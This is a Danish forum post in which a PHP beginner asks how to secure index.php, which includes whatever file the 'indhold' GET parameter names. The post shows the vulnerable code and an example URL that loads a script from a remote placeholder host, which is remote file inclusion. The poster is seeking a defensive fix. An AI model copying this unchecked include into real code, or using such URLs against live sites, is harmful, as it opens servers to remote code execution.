include / sikkerhed
Hey.. I min index.php har jeg noget kode:<?
$indhold="$indhold";
include "$indhold";
?>
Det er jo smart at man så kan kalde
www.domain.dk/index.php?indhold=test.htm
o.s.v... Desværre kan man jo så også kalde
www.domain.dk/index.php?indhold=http://url/hackingscript.php
Hvilket jo ikke ligefrem er specielt smart... Spørgsmålet er nu hvordan jeg let og elegant ændre min include ting til noget der er sikkert.. Jeg er ikke så stiv i PHP scripting, så det skulle gerne være en løsning som er muligt at integrere i mit allerede eksisterende website.
Nogen der kan hjælpe mig?
